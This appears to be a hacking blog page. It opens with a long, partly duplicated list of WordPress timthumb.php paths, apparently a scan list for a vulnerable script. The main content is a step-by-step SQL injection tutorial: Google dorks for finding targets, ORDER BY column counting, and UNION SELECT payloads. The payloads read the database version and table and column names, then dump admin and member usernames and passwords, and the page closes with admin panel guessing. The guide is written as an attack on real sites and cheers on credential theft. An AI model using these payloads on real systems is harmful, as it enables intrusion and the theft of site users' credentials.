wp-content/themes/automotive-blog-theme/Quick%20Cash%20Auto/timthumb.php
wp-content/themes/aurorae/timthumb.php
wp-content/themes/aureola/scripts/timthumb.php
wp-content/themes/artisan/includes/timthumb.php
wp-content/themes/arthemix-green/scripts/timthumb.php
wp-content/themes/arthemix-bronze/scripts/timthumb.php
wp-content/themes/arras/library/timthumb.php
wp-content/themes/arras-theme/library/timthumb.php
wp-content/themes/aranovo/scripts/timthumb.php
wp-content/themes/aqua-blue/includes/timthumb.php
wp-content/themes/amphion-lite/script/timthumb.php
wp-content/themes/albizia/includes/timthumb.php
wp-content/themes/aesthete/timthumb.php
wp-content/themes/aerial/lib/timthumb.php
wp-content/themes/a-supercms/timthumb.php
wp-content/themes/a-simple-business-theme/scripts/timthumb.php
wp-content/themes/8q/scripts/timthumb.php
wp-content/themes/zcool-like/timthumb.php
wp-content/themes/wpbus-d4/includes/timthumb.php
wp-content/themes/wp-premium-orange/timthumb.php
wp-content/themes/wp-perfect/js/timthumb.php
wp-content/themes/wp-newsmagazine/scripts/timthumb.php
wp-content/themes/wp-creativix/scripts/timthumb.php
wp-content/themes/vibefolio-teaser-10/scripts/timthumb.php
wp-content/themes/versitility/timthumb.php
wp-content/themes/unity/timthumb.php
wp-content/themes/ugly/timthumb.php
wp-content/themes/typographywp/timthumb.php
wp-content/themes/twittplus/scripts/timthumb.php
wp-content/themes/ttnews-theme/timthumb.php
wp-content/themes/true-blue-theme/timthumb.php
wp-content/themes/travelogue-theme/scripts/timthumb.php
wp-content/themes/totallyred/scripts/timthumb.php
wp-content/themes/tm-theme/js/timthumb.php
wp-content/themes/the_dark_os/tools/timthumb.php
wp-content/themes/swift/timthumb.php
wp-content/themes/swift/includes/timthumb.php
wp-content/themes/suffusion/timthumb.php
wp-content/themes/squeezepage/timthumb.php
wp-content/themes/spotlight/timthumb.php
wp-content/themes/slidette/timThumb/timthumb.php
wp-content/themes/simplewhite/timthumb.php
wp-content/themes/simplenews_premium/scripts/timthumb.php
wp-content/themes/simple-red-theme/timthumb.php
wp-content/themes/simple-but-great/timthumb.php
wp-content/themes/shadow/timthumb.php
wp-content/themes/shaan/timthumb.php
wp-content/themes/regal/timthumb.php
wp-content/themes/probluezine/timthumb.php
wp-content/themes/postage-sydney/includes/timthumb.php
wp-content/themes/pico/scripts/timthumb.php
wp-content/themes/pearlie/scripts/timthumb.php
wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php
wp-content/themes/neofresh/timthumb.php
wp-content/themes/nash/theme-assets/php/timthumb.php
wp-content/themes/mystique/extensions/auto-thumb/timthumb.php
wp-content/themes/mymag/timthumb.php
wp-content/themes/my-heli/images/timthumb.php
wp-content/themes/moi-magazine/timthumb.php
wp-content/themes/make-money-online-theme/scripts/timthumb.php
wp-content/themes/make-money-online-theme-4/scripts/timthumb.php
wp-content/themes/make-money-online-theme-3/scripts/timthumb.php
wp-content/themes/make-money-online-theme-2/scripts/timthumb.php
wp-content/themes/make-money-online-theme-1/scripts/timthumb.php
wp-content/themes/magup/timthumb.php
wp-content/themes/litepress/scripts/timthumb.php
wp-content/themes/likehacker/timthumb.php
wp-content/themes/jellyfish/lib/rt-timthumb.php
wp-content/themes/iwana-v10/timthumb.php
wp-content/themes/impressio/timthumb/timthumb.php
wp-content/themes/ideatheme/timthumb.php
wp-content/themes/here-comes-the-bride/lib/rt-timthumb.php
wp-content/themes/heli-1-wordpress-theme/images/timthumb.php
wp-content/themes/greyzed/functions/efrog/lib/timthumb.php
wp-content/themes/greydove/timthumb.php
wp-content/themes/granite-lite/scripts/timthumb.php
wp-content/themes/go-green/modules/timthumb.php
wp-content/themes/fresh-blu/scripts/timthumb.php
wp-content/themes/flix/timthumb.php
wp-content/themes/fliphoto/timthumb.php
wp-content/themes/featuring/timthumb.php
wp-content/themes/famous/timthumb.php
wp-content/themes/evr-green/scripts/timthumb.php
wp-content/themes/epione/script/timthumb.php
wp-content/themes/dimenzion/timthumb.php
wp-content/themes/deep-blue/timthumb.php
wp-content/themes/dark-dream-media/timthumb.php
wp-content/themes/coverht-wp/scripts/timthumb.php
wp-content/themes/cover-wp/scripts/timthumb.php
wp-content/themes/constructor/timthumb.php
wp-content/themes/constructor/libs/timthumb.php
wp-content/themes/conceditor-wp-strict/scripts/timthumb.php
wp-content/themes/comet/scripts/timthumb.php
wp-content/themes/calotropis/includes/timthumb.php
wp-content/themes/business-turnkey/assets/js/timthumb.php
wp-content/themes/brochure-melbourne/includes/timthumb.php
wp-content/themes/brightsky/scripts/timthumb.php
wp-content/themes/breakingnewz/timthumb.php
wp-content/themes/bombax/includes/timthumb.php
wp-content/themes/bluemag/library/timthumb.php
wp-content/themes/blue-news/scripts/timthumb.php
wp-content/themes/blue-corporate-hyve-theme/timthumb.php
wp-content/themes/blogified/timthumb.php
wp-content/themes/bloggnorge-a1/scripts/timthumb.php
wp-content/themes/blex/scripts/timthumb.php
wp-content/themes/black_eve/timthumb.php
wp-content/themes/automotive-blog-theme/timthumb.php
wp-content/themes/automotive-blog-theme/Quick%20Cash%20Auto/timthumb.php
wp-content/themes/aurorae/timthumb.php
wp-content/themes/aureola/scripts/timthumb.php
wp-content/themes/artisan/includes/timthumb.php
wp-content/themes/arthemix-green/scripts/timthumb.php
wp-content/themes/arthemix-bronze/scripts/timthumb.php
wp-content/themes/arras/library/timthumb.php
wp-content/themes/arras-theme/library/timthumb.php
wp-content/themes/aranovo/scripts/timthumb.php
wp-content/themes/aqua-blue/includes/timthumb.php
wp-content/themes/amphion-lite/script/timthumb.php
wp-content/themes/albizia/includes/timthumb.php
wp-content/themes/aesthete/timthumb.php
wp-content/themes/aerial/lib/timthumb.php
wp-content/themes/a-supercms/timthumb.php
wp-content/themes/a-simple-business-theme/scripts/timthumb.php
wp-content/themes/8q/scripts/timthumb.php
wp-content/plugins/category-grid-view-gallery/includes/timthumb.php
wp-content/plugins/wp-marketplace/libs/timthumb.php
wp-content/plugins/dp-thumbnail/timthumb/timthumb.php
wp-content/plugins/vk-gallery/lib/timthumb.php
wp-content/plugins/cac-featured-content/timthumb.php
wp-content/plugins/rent-a-car/libs/timthumb.php
wp-content/plugins/lisl-last-image-slider/timthumb.php
wp-content/plugins/islidex/js/timthumb.php
wp-content/plugins/kino-gallery/timthumb.php
wp-content/plugins/cms-pack/timthumb.php
wp-content/plugins/a-gallery/timthumb.php
wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php
wp-content/plugins/verve-meta-boxes/tools/timthumb.php
wp-content/plugins/extend-wordpress/helpers/timthumb/image.php
wp-content/plugins/timthumb-vulnerability-scanner/cg-tvs-admin-panel.php
wp-content/plugins/wp-marketplace/libs/timthumb.php
wp-content/plugins/category-grid-view-gallery/includes/timthumb.php
wp-content/plugins/wp-marketplace/libs/timthumb.php
wp-content/plugins/dp-thumbnail/timthumb/timthumb.php
wp-content/plugins/vk-gallery/lib/timthumb.php
wp-content/plugins/dp-thumbnail/timthumb/timthumb.php
wp-content/plugins/vk-gallery/lib/timthumb.php
wp-content/plugins/uBillboard/timthumb.php


Lear Complactiv Download Here
 

Hacking website using SQL Injection -step by step guide


Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A...t.zip.html

How to use?
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.


Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:

site:www.victimsite.com inurl:index.php?id=
 Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes)

For eg:
http://www.victimsite.com/index.php?id=2'
 If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!
For eg:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number and order by n statement)

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
 change the number until you get the error as "unknown column"

if you get the error while trying the "x"th number,then no of column is "x-1".

I mean:
http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)

 
 so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the "--" at the end of the statement.
For eg:

http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Displaying the Vulnerable columns:
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--


It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).

Like this:



Now select 1 number.
It showing 3,7. Let's take the Number 3.

Step 5: Finding version,database,user
Now replace the 3 from the query with "version()"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--


It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--



Step 6: Finding the Table Name
 if the version is 5 or above. Then follow these steps.  Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
 Now it will show the list of table names. Find the table name which is related with the admin or user.




Now select the "admin " table.

if the version is 4 or some others, you have to guess the table names. (user, tbluser).  It is hard and bore to do sql inection with version 4.

Step 7: Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.


Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..


Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.


Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password.
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.
If you have luck ,you will find the admin page using above urls. or try this list .
Here is the list of admin urls:

http://www.ziddu.com/download/13163866/A...t.zip.html
Pepe Ruller. Diberdayakan oleh Blogger.
 
Yahoo Messenger
Send Me IM!
Google Plus
Add Me To Your Circle!
Twitter
Follow Me!
Facebook
Add My Facebook
Original Template By Belajar SEO Blogspot - Himajiesized By Dayz Hidayat